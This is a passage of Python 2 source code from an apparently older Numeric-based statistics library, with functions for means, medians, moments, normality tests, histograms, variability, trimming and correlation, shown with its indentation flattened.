s = N.reshape(s,shp)
else: # must be a SEQUENCE of dims to average over
dims = list(dimension)
dims.sort()
nondims = []
for i in range(len(inarray.shape)):
if i not in dims:
nondims.append(i)
tinarray = N.transpose(inarray,nondims+dims) # put keep-dims first
idx = [0] *len(nondims)
if idx == []:
size = len(N.ravel(inarray))
s = asum(1.0 / inarray)
if keepdims == 1:
s = N.reshape([s],N.ones(len(inarray.shape)))
else:
idx[0] = -1
loopcap = N.array(tinarray.shape[0:len(nondims)]) -1
s = N.zeros(loopcap+1,N.Float)
while incr(idx,loopcap) <> -1:
s[idx] = asum(1.0/tinarray[idx])
size = N.multiply.reduce(N.take(inarray.shape,dims))
if keepdims == 1:
shp = list(inarray.shape)
for dim in dims:
shp[dim] = 1
s = N.reshape(s,shp)
return size / s
def amean (inarray,dimension=None,keepdims=0):
"""
Calculates the arithmatic mean of the values in the passed array.
That is: 1/n * (x1 + x2 + ... + xn). Defaults to ALL values in the
passed array. Use dimension=None to flatten array first. REMEMBER: if
dimension=0, it collapses over dimension 0 ('rows' in a 2D array) only, and
if dimension is a sequence, it collapses over all specified dimensions. If
keepdims is set to 1, the resulting array will have as many dimensions as
inarray, with only 1 'level' per dim that was collapsed over.
Usage: amean(inarray,dimension=None,keepdims=0)
Returns: arithematic mean calculated over dim(s) in dimension
"""
if inarray.typecode() in ['l','s','b']:
inarray = inarray.astype(N.Float)
if dimension == None:
inarray = N.ravel(inarray)
sum = N.add.reduce(inarray)
denom = float(len(inarray))
elif type(dimension) in [IntType,FloatType]:
sum = asum(inarray,dimension)
denom = float(inarray.shape[dimension])
if keepdims == 1:
shp = list(inarray.shape)
shp[dimension] = 1
sum = N.reshape(sum,shp)
else: # must be a TUPLE of dims to average over
dims = list(dimension)
dims.sort()
dims.reverse()
sum = inarray *1.0
for dim in dims:
sum = N.add.reduce(sum,dim)
denom = N.array(N.multiply.reduce(N.take(inarray.shape,dims)),N.Float)
if keepdims == 1:
shp = list(inarray.shape)
for dim in dims:
shp[dim] = 1
sum = N.reshape(sum,shp)
return sum/denom
def amedian (inarray,numbins=1000):
"""
Calculates the COMPUTED median value of an array of numbers, given the
number of bins to use for the histogram (more bins approaches finding the
precise median value of the array; default number of bins = 1000). From
G.W. Heiman's Basic Stats, or CRC Probability & Statistics.
NOTE: THIS ROUTINE ALWAYS uses the entire passed array (flattens it first).
Usage: amedian(inarray,numbins=1000)
Returns: median calculated over ALL values in inarray
"""
inarray = N.ravel(inarray)
(hist, smallest, binsize, extras) = ahistogram(inarray,numbins)
cumhist = N.cumsum(hist) # make cumulative histogram
otherbins = N.greater_equal(cumhist,len(inarray)/2.0)
otherbins = list(otherbins) # list of 0/1s, 1s start at median bin
cfbin = otherbins.index(1) # get 1st(!) index holding 50%ile score
LRL = smallest + binsize*cfbin # get lower read limit of that bin
cfbelow = N.add.reduce(hist[0:cfbin]) # cum. freq. below bin
freq = hist[cfbin] # frequency IN the 50%ile bin
median = LRL + ((len(inarray)/2.0-cfbelow)/float(freq))*binsize # MEDIAN
return median
def amedianscore (inarray,dimension=None):
"""
Returns the 'middle' score of the passed array. If there is an even
number of scores, the mean of the 2 middle scores is returned. Can function
with 1D arrays, or on the FIRST dimension of 2D arrays (i.e., dimension can
be None, to pre-flatten the array, or else dimension must equal 0).
Usage: amedianscore(inarray,dimension=None)
Returns: 'middle' score of the array, or the mean of the 2 middle scores
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
inarray = N.sort(inarray,dimension)
if inarray.shape[dimension] % 2 == 0: # if even number of elements
indx = inarray.shape[dimension]/2 # integer division correct
median = N.asarray(inarray[indx]+inarray[indx-1]) / 2.0
else:
indx = inarray.shape[dimension] / 2 # integer division correct
median = N.take(inarray,[indx],dimension)
if median.shape == (1,):
median = median[0]
return median
def amode(a, dimension=None):
"""
Returns an array of the modal (most common) score in the passed array.
If there is more than one such score, ONLY THE FIRST is returned.
The bin-count for the modal values is also returned. Operates on whole
array (dimension=None), or on a given dimension.
Usage: amode(a, dimension=None)
Returns: array of bin-counts for mode(s), array of corresponding modal values
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
scores = pstat.aunique(N.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[dimension] = 1
oldmostfreq = N.zeros(testshape)
oldcounts = N.zeros(testshape)
for score in scores:
template = N.equal(a,score)
counts = asum(template,dimension,1)
mostfrequent = N.where(N.greater(counts,oldcounts),score,oldmostfreq)
oldcounts = N.where(N.greater(counts,oldcounts),counts,oldcounts)
oldmostfreq = mostfrequent
return oldcounts, mostfrequent
def atmean(a,limits=None,inclusive=(1,1)):
"""
Returns the arithmetic mean of all values in an array, ignoring values
strictly outside the sequence passed to 'limits'. Note: either limit
in the sequence, or the value of limits itself, can be set to None. The
inclusive list/tuple determines whether the lower and upper limiting bounds
(respectively) are open/exclusive (0) or closed/inclusive (1).
Usage: atmean(a,limits=None,inclusive=(1,1))
"""
if a.typecode() in ['l','s','b']:
a = a.astype(N.Float)
if limits == None:
return mean(a)
assert type(limits) in [ListType,TupleType,N.ArrayType], "Wrong type for limits in atmean"
if inclusive[0]: lowerfcn = N.greater_equal
else: lowerfcn = N.greater
if inclusive[1]: upperfcn = N.less_equal
else: upperfcn = N.less
if limits[0] > N.maximum.reduce(N.ravel(a)) or limits[1] < N.minimum.reduce(N.ravel(a)):
raise ValueError, "No array values within given limits (atmean)."
elif limits[0]==None and limits[1]<>None:
mask = upperfcn(a,limits[1])
elif limits[0]<>None and limits[1]==None:
mask = lowerfcn(a,limits[0])
elif limits[0]<>None and limits[1]<>None:
mask = lowerfcn(a,limits[0])*upperfcn(a,limits[1])
s = float(N.add.reduce(N.ravel(a*mask)))
n = float(N.add.reduce(N.ravel(mask)))
return s/n
def atvar(a,limits=None,inclusive=(1,1)):
"""
Returns the sample variance of values in an array, (i.e., using N-1),
ignoring values strictly outside the sequence passed to 'limits'.
Note: either limit in the sequence, or the value of limits itself,
can be set to None. The inclusive list/tuple determines whether the lower
and upper limiting bounds (respectively) are open/exclusive (0) or
closed/inclusive (1).
Usage: atvar(a,limits=None,inclusive=(1,1))
"""
a = a.astype(N.Float)
if limits == None or limits == [None,None]:
term1 = N.add.reduce(N.ravel(a*a))
n = float(len(N.ravel(a))) - 1
term2 = N.add.reduce(N.ravel(a))**2 / n
print term1, term2, n
return (term1 - term2) / n
assert type(limits) in [ListType,TupleType,N.ArrayType], "Wrong type for limits in atvar"
if inclusive[0]: lowerfcn = N.greater_equal
else: lowerfcn = N.greater
if inclusive[1]: upperfcn = N.less_equal
else: upperfcn = N.less
if limits[0] > N.maximum.reduce(N.ravel(a)) or limits[1] < N.minimum.reduce(N.ravel(a)):
raise ValueError, "No array values within given limits (atvar)."
elif limits[0]==None and limits[1]<>None:
mask = upperfcn(a,limits[1])
elif limits[0]<>None and limits[1]==None:
mask = lowerfcn(a,limits[0])
elif limits[0]<>None and limits[1]<>None:
mask = lowerfcn(a,limits[0])*upperfcn(a,limits[1])
term1 = N.add.reduce(N.ravel(a*a*mask))
n = float(N.add.reduce(N.ravel(mask))) - 1
term2 = N.add.reduce(N.ravel(a*mask))**2 / n
print term1, term2, n
return (term1 - term2) / n
def atmin(a,lowerlimit=None,dimension=None,inclusive=1):
"""
Returns the minimum value of a, along dimension, including only values less
than (or equal to, if inclusive=1) lowerlimit. If the limit is set to None,
all values in the array are used.
Usage: atmin(a,lowerlimit=None,dimension=None,inclusive=1)
"""
if inclusive: lowerfcn = N.greater
else: lowerfcn = N.greater_equal
if dimension == None:
a = N.ravel(a)
dimension = 0
if lowerlimit == None:
lowerlimit = N.minimum.reduce(N.ravel(a))-11
biggest = N.maximum.reduce(N.ravel(a))
ta = N.where(lowerfcn(a,lowerlimit),a,biggest)
return N.minimum.reduce(ta,dimension)
def atmax(a,upperlimit,dimension=None,inclusive=1):
"""
Returns the maximum value of a, along dimension, including only values greater
than (or equal to, if inclusive=1) upperlimit. If the limit is set to None,
a limit larger than the max value in the array is used.
Usage: atmax(a,upperlimit,dimension=None,inclusive=1)
"""
if inclusive: upperfcn = N.less
else: upperfcn = N.less_equal
if dimension == None:
a = N.ravel(a)
dimension = 0
if upperlimit == None:
upperlimit = N.maximum.reduce(N.ravel(a))+1
smallest = N.minimum.reduce(N.ravel(a))
ta = N.where(upperfcn(a,upperlimit),a,smallest)
return N.maximum.reduce(ta,dimension)
def atstdev(a,limits=None,inclusive=(1,1)):
"""
Returns the standard deviation of all values in an array, ignoring values
strictly outside the sequence passed to 'limits'. Note: either limit
in the sequence, or the value of limits itself, can be set to None. The
inclusive list/tuple determines whether the lower and upper limiting bounds
(respectively) are open/exclusive (0) or closed/inclusive (1).
Usage: atstdev(a,limits=None,inclusive=(1,1))
"""
return N.sqrt(tvar(a,limits,inclusive))
def atsem(a,limits=None,inclusive=(1,1)):
"""
Returns the standard error of the mean for the values in an array,
(i.e., using N for the denominator), ignoring values strictly outside
the sequence passed to 'limits'. Note: either limit in the sequence,
or the value of limits itself, can be set to None. The inclusive list/tuple
determines whether the lower and upper limiting bounds (respectively) are
open/exclusive (0) or closed/inclusive (1).
Usage: atsem(a,limits=None,inclusive=(1,1))
"""
sd = tstdev(a,limits,inclusive)
if limits == None or limits == [None,None]:
n = float(len(N.ravel(a)))
assert type(limits) in [ListType,TupleType,N.ArrayType], "Wrong type for limits in atsem"
if inclusive[0]: lowerfcn = N.greater_equal
else: lowerfcn = N.greater
if inclusive[1]: upperfcn = N.less_equal
else: upperfcn = N.less
if limits[0] > N.maximum.reduce(N.ravel(a)) or limits[1] < N.minimum.reduce(N.ravel(a)):
raise ValueError, "No array values within given limits (atsem)."
elif limits[0]==None and limits[1]<>None:
mask = upperfcn(a,limits[1])
elif limits[0]<>None and limits[1]==None:
mask = lowerfcn(a,limits[0])
elif limits[0]<>None and limits[1]<>None:
mask = lowerfcn(a,limits[0])*upperfcn(a,limits[1])
term1 = N.add.reduce(N.ravel(a*a*mask))
n = float(N.add.reduce(N.ravel(mask)))
return sd/math.sqrt(n)
#####################################
############ AMOMENTS #############
#####################################
def amoment(a,moment=1,dimension=None):
"""
Calculates the nth moment about the mean for a sample (defaults to the
1st moment). Generally used to calculate coefficients of skewness and
kurtosis. Dimension can equal None (ravel array first), an integer
(the dimension over which to operate), or a sequence (operate over
multiple dimensions).
Usage: amoment(a,moment=1,dimension=None)
Returns: appropriate moment along given dimension
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
if moment == 1:
return 0.0
else:
mn = amean(a,dimension,1) # 1=keepdims
s = N.power((a-mn),moment)
return amean(s,dimension)
def avariation(a,dimension=None):
"""
Returns the coefficient of variation, as defined in CRC Standard
Probability and Statistics, p.6. Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions).
Usage: avariation(a,dimension=None)
"""
return 100.0*asamplestdev(a,dimension)/amean(a,dimension)
def askew(a,dimension=None):
"""
Returns the skewness of a distribution (normal ==> 0.0; >0 means extra
weight in left tail). Use askewtest() to see if it's close enough.
Dimension can equal None (ravel array first), an integer (the
dimension over which to operate), or a sequence (operate over multiple
dimensions).
Usage: askew(a, dimension=None)
Returns: skew of vals in a along dimension, returning ZERO where all vals equal
"""
denom = N.power(amoment(a,2,dimension),1.5)
zero = N.equal(denom,0)
if type(denom) == N.ArrayType and asum(zero) <> 0:
print "Number of zeros in askew: ",asum(zero)
denom = denom + zero # prevent divide-by-zero
return N.where(zero, 0, amoment(a,3,dimension)/denom)
def akurtosis(a,dimension=None):
"""
Returns the kurtosis of a distribution (normal ==> 3.0; >3 means
heavier in the tails, and usually more peaked). Use akurtosistest()
to see if it's close enough. Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions).
Usage: akurtosis(a,dimension=None)
Returns: kurtosis of values in a along dimension, and ZERO where all vals equal
"""
denom = N.power(amoment(a,2,dimension),2)
zero = N.equal(denom,0)
if type(denom) == N.ArrayType and asum(zero) <> 0:
print "Number of zeros in akurtosis: ",asum(zero)
denom = denom + zero # prevent divide-by-zero
return N.where(zero,0,amoment(a,4,dimension)/denom)
def adescribe(inarray,dimension=None):
"""
Returns several descriptive statistics of the passed array. Dimension
can equal None (ravel array first), an integer (the dimension over
which to operate), or a sequence (operate over multiple dimensions).
Usage: adescribe(inarray,dimension=None)
Returns: n, (min,max), mean, standard deviation, skew, kurtosis
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
n = inarray.shape[dimension]
mm = (N.minimum.reduce(inarray),N.maximum.reduce(inarray))
m = amean(inarray,dimension)
sd = astdev(inarray,dimension)
skew = askew(inarray,dimension)
kurt = akurtosis(inarray,dimension)
return n, mm, m, sd, skew, kurt
#####################################
######## NORMALITY TESTS ##########
#####################################
def askewtest(a,dimension=None):
"""
Tests whether the skew is significantly different from a normal
distribution. Dimension can equal None (ravel array first), an
integer (the dimension over which to operate), or a sequence (operate
over multiple dimensions).
Usage: askewtest(a,dimension=None)
Returns: z-score and 2-tail z-probability
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
b2 = askew(a,dimension)
n = float(a.shape[dimension])
y = b2 * N.sqrt(((n+1)*(n+3)) / (6.0*(n-2)) )
beta2 = ( 3.0*(n*n+27*n-70)*(n+1)*(n+3) ) / ( (n-2.0)*(n+5)*(n+7)*(n+9) )
W2 = -1 + N.sqrt(2*(beta2-1))
delta = 1/N.sqrt(N.log(N.sqrt(W2)))
alpha = N.sqrt(2/(W2-1))
y = N.where(N.equal(y,0),1,y)
Z = delta*N.log(y/alpha + N.sqrt((y/alpha)**2+1))
return Z, (1.0-zprob(Z))*2
def akurtosistest(a,dimension=None):
"""
Tests whether a dataset has normal kurtosis (i.e.,
kurtosis=3(n-1)/(n+1)) Valid only for n>20. Dimension can equal None
(ravel array first), an integer (the dimension over which to operate),
or a sequence (operate over multiple dimensions).
Usage: akurtosistest(a,dimension=None)
Returns: z-score and 2-tail z-probability, returns 0 for bad pixels
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
n = float(a.shape[dimension])
if n<20:
print "akurtosistest only valid for n>=20 ... continuing anyway, n=",n
b2 = akurtosis(a,dimension)
E = 3.0*(n-1) /(n+1)
varb2 = 24.0*n*(n-2)*(n-3) / ((n+1)*(n+1)*(n+3)*(n+5))
x = (b2-E)/N.sqrt(varb2)
sqrtbeta1 = 6.0*(n*n-5*n+2)/((n+7)*(n+9)) * N.sqrt((6.0*(n+3)*(n+5))/
(n*(n-2)*(n-3)))
A = 6.0 + 8.0/sqrtbeta1 *(2.0/sqrtbeta1 + N.sqrt(1+4.0/(sqrtbeta1**2)))
term1 = 1 -2/(9.0*A)
denom = 1 +x*N.sqrt(2/(A-4.0))
denom = N.where(N.less(denom,0), 99, denom)
term2 = N.where(N.equal(denom,0), term1, N.power((1-2.0/A)/denom,1/3.0))
Z = ( term1 - term2 ) / N.sqrt(2/(9.0*A))
Z = N.where(N.equal(denom,99), 0, Z)
return Z, (1.0-zprob(Z))*2
def anormaltest(a,dimension=None):
"""
Tests whether skew and/OR kurtosis of dataset differs from normal
curve. Can operate over multiple dimensions. Dimension can equal
None (ravel array first), an integer (the dimension over which to
operate), or a sequence (operate over multiple dimensions).
Usage: anormaltest(a,dimension=None)
Returns: z-score and 2-tail probability
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
s,p = askewtest(a,dimension)
k,p = akurtosistest(a,dimension)
k2 = N.power(s,2) + N.power(k,2)
return k2, achisqprob(k2,2)
#####################################
###### AFREQUENCY FUNCTIONS #######
#####################################
def aitemfreq(a):
"""
Returns a 2D array of item frequencies. Column 1 contains item values,
column 2 contains their respective counts. Assumes a 1D array is passed.
Usage: aitemfreq(a)
Returns: a 2D frequency table (col [0:n-1]=scores, col n=frequencies)
"""
scores = pstat.aunique(a)
scores = N.sort(scores)
freq = N.zeros(len(scores))
for i in range(len(scores)):
freq[i] = N.add.reduce(N.equal(a,scores[i]))
return N.array(pstat.aabut(scores, freq))
def ascoreatpercentile (inarray, percent):
"""
Usage: ascoreatpercentile(inarray,percent) 0<percent<100
Returns: score at given percentile, relative to inarray distribution
"""
percent = percent / 100.0
targetcf = percent*len(inarray)
h, lrl, binsize, extras = histogram(inarray)
cumhist = cumsum(h*1)
for i in range(len(cumhist)):
if cumhist[i] >= targetcf:
break
score = binsize * ((targetcf - cumhist[i-1]) / float(h[i])) + (lrl+binsize*i)
return score
def apercentileofscore (inarray,score,histbins=10,defaultlimits=None):
"""
Note: result of this function depends on the values used to histogram
the data(!).
Usage: apercentileofscore(inarray,score,histbins=10,defaultlimits=None)
Returns: percentile-position of score (0-100) relative to inarray
"""
h, lrl, binsize, extras = histogram(inarray,histbins,defaultlimits)
cumhist = cumsum(h*1)
i = int((score - lrl)/float(binsize))
pct = (cumhist[i-1]+((score-(lrl+binsize*i))/float(binsize))*h[i])/float(len(inarray)) * 100
return pct
def ahistogram (inarray,numbins=10,defaultlimits=None,printextras=1):
"""
Returns (i) an array of histogram bin counts, (ii) the smallest value
of the histogram binning, and (iii) the bin width (the last 2 are not
necessarily integers). Default number of bins is 10. Defaultlimits
can be None (the routine picks bins spanning all the numbers in the
inarray) or a 2-sequence (lowerlimit, upperlimit). Returns all of the
following: array of bin values, lowerreallimit, binsize, extrapoints.
Usage: ahistogram(inarray,numbins=10,defaultlimits=None,printextras=1)
Returns: (array of bin counts, bin-minimum, min-width, #-points-outside-range)
"""
inarray = N.ravel(inarray) # flatten any >1D arrays
if (defaultlimits <> None):
lowerreallimit = defaultlimits[0]
upperreallimit = defaultlimits[1]
binsize = (upperreallimit-lowerreallimit) / float(numbins)
else:
Min = N.minimum.reduce(inarray)
Max = N.maximum.reduce(inarray)
estbinwidth = float(Max - Min)/float(numbins) + 1
binsize = (Max-Min+estbinwidth)/float(numbins)
lowerreallimit = Min - binsize/2.0 #lower real limit,1st bin
bins = N.zeros(numbins)
extrapoints = 0
for num in inarray:
try:
if (num-lowerreallimit) < 0:
extrapoints = extrapoints + 1
else:
bintoincrement = int((num-lowerreallimit) / float(binsize))
bins[bintoincrement] = bins[bintoincrement] + 1
except: # point outside lower/upper limits
extrapoints = extrapoints + 1
if (extrapoints > 0 and printextras == 1):
print '\nPoints outside given histogram range =',extrapoints
return (bins, lowerreallimit, binsize, extrapoints)
def acumfreq(a,numbins=10,defaultreallimits=None):
"""
Returns a cumulative frequency histogram, using the histogram function.
Defaultreallimits can be None (use all data), or a 2-sequence containing
lower and upper limits on values to include.
Usage: acumfreq(a,numbins=10,defaultreallimits=None)
Returns: array of cumfreq bin values, lowerreallimit, binsize, extrapoints
"""
h,l,b,e = histogram(a,numbins,defaultreallimits)
cumhist = cumsum(h*1)
return cumhist,l,b,e
def arelfreq(a,numbins=10,defaultreallimits=None):
"""
Returns a relative frequency histogram, using the histogram function.
Defaultreallimits can be None (use all data), or a 2-sequence containing
lower and upper limits on values to include.
Usage: arelfreq(a,numbins=10,defaultreallimits=None)
Returns: array of cumfreq bin values, lowerreallimit, binsize, extrapoints
"""
h,l,b,e = histogram(a,numbins,defaultreallimits)
h = N.array(h/float(a.shape[0]))
return h,l,b,e
#####################################
###### AVARIABILITY FUNCTIONS #####
#####################################
def aobrientransform(*args):
"""
Computes a transform on input data (any number of columns). Used to
test for homogeneity of variance prior to running one-way stats. Each
array in *args is one level of a factor. If an F_oneway() run on the
transformed data and found significant, variances are unequal. From
Maxwell and Delaney, p.112.
Usage: aobrientransform(*args) *args = 1D arrays, one per level of factor
Returns: transformed data for use in an ANOVA
"""
TINY = 1e-10
k = len(args)
n = N.zeros(k,N.Float)
v = N.zeros(k,N.Float)
m = N.zeros(k,N.Float)
nargs = []
for i in range(k):
nargs.append(args[i].astype(N.Float))
n[i] = float(len(nargs[i]))
v[i] = var(nargs[i])
m[i] = mean(nargs[i])
for j in range(k):
for i in range(n[j]):
t1 = (n[j]-1.5)*n[j]*(nargs[j][i]-m[j])**2
t2 = 0.5*v[j]*(n[j]-1.0)
t3 = (n[j]-1.0)*(n[j]-2.0)
nargs[j][i] = (t1-t2) / float(t3)
check = 1
for j in range(k):
if v[j] - mean(nargs[j]) > TINY:
check = 0
if check <> 1:
raise ValueError, 'Lack of convergence in obrientransform.'
else:
return N.array(nargs)
def asamplevar (inarray,dimension=None,keepdims=0):
"""
Returns the sample standard deviation of the values in the passed
array (i.e., using N). Dimension can equal None (ravel array first),
an integer (the dimension over which to operate), or a sequence
(operate over multiple dimensions). Set keepdims=1 to return an array
with the same number of dimensions as inarray.
Usage: asamplevar(inarray,dimension=None,keepdims=0)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
if dimension == 1:
mn = amean(inarray,dimension)[:,N.NewAxis]
else:
mn = amean(inarray,dimension,keepdims=1)
deviations = inarray - mn
if type(dimension) == ListType:
n = 1
for d in dimension:
n = n*inarray.shape[d]
else:
n = inarray.shape[dimension]
svar = ass(deviations,dimension,keepdims) / float(n)
return svar
def asamplestdev (inarray, dimension=None, keepdims=0):
"""
Returns the sample standard deviation of the values in the passed
array (i.e., using N). Dimension can equal None (ravel array first),
an integer (the dimension over which to operate), or a sequence
(operate over multiple dimensions). Set keepdims=1 to return an array
with the same number of dimensions as inarray.
Usage: asamplestdev(inarray,dimension=None,keepdims=0)
"""
return N.sqrt(asamplevar(inarray,dimension,keepdims))
def asignaltonoise(instack,dimension=0):
"""
Calculates signal-to-noise. Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions).
Usage: asignaltonoise(instack,dimension=0):
Returns: array containing the value of (mean/stdev) along dimension,
or 0 when stdev=0
"""
m = mean(instack,dimension)
sd = stdev(instack,dimension)
return N.where(N.equal(sd,0),0,m/sd)
def avar (inarray, dimension=None,keepdims=0):
"""
Returns the estimated population variance of the values in the passed
array (i.e., N-1). Dimension can equal None (ravel array first), an
integer (the dimension over which to operate), or a sequence (operate
over multiple dimensions). Set keepdims=1 to return an array with the
same number of dimensions as inarray.
Usage: avar(inarray,dimension=None,keepdims=0)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
mn = amean(inarray,dimension,1)
deviations = inarray - mn
if type(dimension) == ListType:
n = 1
for d in dimension:
n = n*inarray.shape[d]
else:
n = inarray.shape[dimension]
var = ass(deviations,dimension,keepdims)/float(n-1)
return var
def astdev (inarray, dimension=None, keepdims=0):
"""
Returns the estimated population standard deviation of the values in
the passed array (i.e., N-1). Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions). Set keepdims=1 to return
an array with the same number of dimensions as inarray.
Usage: astdev(inarray,dimension=None,keepdims=0)
"""
return N.sqrt(avar(inarray,dimension,keepdims))
def asterr (inarray, dimension=None, keepdims=0):
"""
Returns the estimated population standard error of the values in the
passed array (i.e., N-1). Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions). Set keepdims=1 to return
an array with the same number of dimensions as inarray.
Usage: asterr(inarray,dimension=None,keepdims=0)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
return astdev(inarray,dimension,keepdims) / float(N.sqrt(inarray.shape[dimension]))
def asem (inarray, dimension=None, keepdims=0):
"""
Returns the standard error of the mean (i.e., using N) of the values
in the passed array. Dimension can equal None (ravel array first), an
integer (the dimension over which to operate), or a sequence (operate
over multiple dimensions). Set keepdims=1 to return an array with the
same number of dimensions as inarray.
Usage: asem(inarray,dimension=None, keepdims=0)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
if type(dimension) == ListType:
n = 1
for d in dimension:
n = n*inarray.shape[d]
else:
n = inarray.shape[dimension]
s = asamplestdev(inarray,dimension,keepdims) / N.sqrt(n-1)
return s
def az (a, score):
"""
Returns the z-score of a given input score, given thearray from which
that score came. Not appropriate for population calculations, nor for
arrays > 1D.
Usage: az(a, score)
"""
z = (score-amean(a)) / asamplestdev(a)
return z
def azs (a):
"""
Returns a 1D array of z-scores, one for each score in the passed array,
computed relative to the passed array.
Usage: azs(a)
"""
zscores = []
for item in a:
zscores.append(z(a,item))
return N.array(zscores)
def azmap (scores, compare, dimension=0):
"""
Returns an array of z-scores the shape of scores (e.g., [x,y]), compared to
array passed to compare (e.g., [time,x,y]). Assumes collapsing over dim 0
of the compare array.
Usage: azs(scores, compare, dimension=0)
"""
mns = amean(compare,dimension)
sstd = asamplestdev(compare,0)
return (scores - mns) / sstd
#####################################
####### ATRIMMING FUNCTIONS #######
#####################################
def around(a,digits=1):
"""
Rounds all values in array a to 'digits' decimal places.
Usage: around(a,digits)
Returns: a, where each value is rounded to 'digits' decimals
"""
def ar(x,d=digits):
return round(x,d)
if type(a) <> N.ArrayType:
try:
a = N.array(a)
except:
a = N.array(a,'O')
shp = a.shape
if a.typecode() in ['f','F','d','D']:
b = N.ravel(a)
b = N.array(map(ar,b))
b.shape = shp
elif a.typecode() in ['o','O']:
b = N.ravel(a)*1
for i in range(len(b)):
if type(b[i]) == FloatType:
b[i] = round(b[i],digits)
b.shape = shp
else: # not a float, double or Object array
b = a*1
return b
def athreshold(a,threshmin=None,threshmax=None,newval=0):
"""
Like Numeric.clip() except that values <threshmid or >threshmax are replaced
by newval instead of by threshmin/threshmax (respectively).
Usage: athreshold(a,threshmin=None,threshmax=None,newval=0)
Returns: a, with values <threshmin or >threshmax replaced with newval
"""
mask = N.zeros(a.shape)
if threshmin <> None:
mask = mask + N.where(N.less(a,threshmin),1,0)
if threshmax <> None:
mask = mask + N.where(N.greater(a,threshmax),1,0)
mask = N.clip(mask,0,1)
return N.where(mask,newval,a)
def atrimboth (a,proportiontocut):
"""
Slices off the passed proportion of items from BOTH ends of the passed
array (i.e., with proportiontocut=0.1, slices 'leftmost' 10% AND
'rightmost' 10% of scores. You must pre-sort the array if you want
"proper" trimming. Slices off LESS if proportion results in a
non-integer slice index (i.e., conservatively slices off
proportiontocut).
Usage: atrimboth (a,proportiontocut)
Returns: trimmed version of array a
"""
lowercut = int(proportiontocut*len(a))
uppercut = len(a) - lowercut
return a[lowercut:uppercut]
def atrim1 (a,proportiontocut,tail='right'):
"""
Slices off the passed proportion of items from ONE end of the passed
array (i.e., if proportiontocut=0.1, slices off 'leftmost' or 'rightmost'
10% of scores). Slices off LESS if proportion results in a non-integer
slice index (i.e., conservatively slices off proportiontocut).
Usage: atrim1(a,proportiontocut,tail='right') or set tail='left'
Returns: trimmed version of array a
"""
if string.lower(tail) == 'right':
lowercut = 0
uppercut = len(a) - int(proportiontocut*len(a))
elif string.lower(tail) == 'left':
lowercut = int(proportiontocut*len(a))
uppercut = len(a)
return a[lowercut:uppercut]
#####################################
##### ACORRELATION FUNCTIONS ######
#####################################
def acovariance(X):
"""
Computes the covariance matrix of a matrix X. Requires a 2D matrix input.
Usage: acovariance(X)
Returns: covariance matrix of X
"""
if len(X.shape) <> 2:
raise TypeError, "acovariance requires 2D matrices"
n = X.shape[0]
mX = amean(X,0)
return N.dot(N.transpose(X),X) / float(n) - N.multiply.outer(mX,mX)
def acorrelation(X):
"""
Computes the correlation matrix of a matrix X. Requires a 2D matrix input.
Usage: acorrelation(X)
Returns: correlation matrix of X
"""
C = acovariance(X)
V = N.diagonal(C)
return C / N.sqrt(N.multiply.outer(V,V))
def apaired(x,y):
"""
Interactively determines the type of data in x and y, and then runs the
appropriated statistic for paired group data.
Usage: apaired(x,y) x,y = the two arrays of values to be compared
Returns: appropriate statistic name, value, and probability
"""
samples = ''
while samples not in ['i','r','I','R','c','C']:
print '\nIndependent or related samples, or correlation (i,r,c): ',
samples = raw_input()
if samples in ['i','I','r','R']:
print '\nComparing variances ...',
# USE O'BRIEN'S TEST FOR HOMOGENEITY OF VARIANCE, Maxwell & delaney, p.112
r = obrientransform(x,y)
f,p = F_oneway(pstat.colex(r,0),pstat.colex(r,1))
if p<0.05:
vartype='unequal, p='+str(round(p,4))
else:
vartype='equal'
print vartype
if samples in ['i','I']:
if vartype[0]=='e':
t,p = ttest_ind(x,y,None,0)
print '\nIndependent samples t-test: ', round(t,4),round(p,4)
else:
if len(x)>20 or len(y)>20:
z,p = ranksums(x,y)
print '\nRank Sums test (NONparametric, n>20): ', round(z,4),round(p,4)
else:
u,p = mannwhitneyu(x,y)
print '\nMann-Whitney U-test (NONparametric, ns<20): ', round(u,4),round(p,4)
else: # RELATED SAMPLES
if vartype[0]=='e':
t,p = ttest_rel(x,y,0)
print '\nRelated samples t-test: ', round(t,4),round(p,4)
else:
t,p = ranksums(x,y)
print '\nWilcoxon T-test (NONparametric): ', round(t,4),round(p,4)
else: # CORRELATION ANALYSIS
corrtype = ''
while corrtype not in ['c','C','r','R','d','D']:
print '\nIs the data Continuous, Ranked, or Dichotomous (c,r,d): ',
corrtype = raw_input()
if corrtype in ['c','C']:
m,b,r,p,see = linregress(x,y)
print '\nLinear regression for continuous variables ...'
lol = [['Slope','Intercept','r','Prob','SEestimate'],[round(m,4),round(b,4),round(r,4),round(p,4),round(see,4)]]
pstat.printcc(lol)
elif corrtype in ['r','R']:
r,p = spearmanr(x,y)
print '\nCorrelation for ranked variables ...'
print "Spearman's r: ",round(r,4),round(p,4)
else: # DICHOTOMOUS
r,p = pointbiserialr(x,y)
print '\nAssuming x contains a dichotomous variable ...'
print 'Point Biserial r: ',round(r,4),round(p,4)
print '\n\n'
return None
def apearsonr(x,y,verbose=1):
"""
Calculates a Pearson correlation coefficient and returns p. Taken
from Heiman's Basic Statistics for the Behav. Sci (2nd), p.195.
Usage: apearsonr(x,y,verbose=1) where x,y are equal length arrays
Returns: Pearson's r, two-tailed p-value
"""
TINY = 1.0e-20
n = len(x)
xmean = amean(x)
ymean = amean(y)
r_num = n*(N.add.reduce(x*y)) - N.add.reduce(x)*N.add.reduce(y)
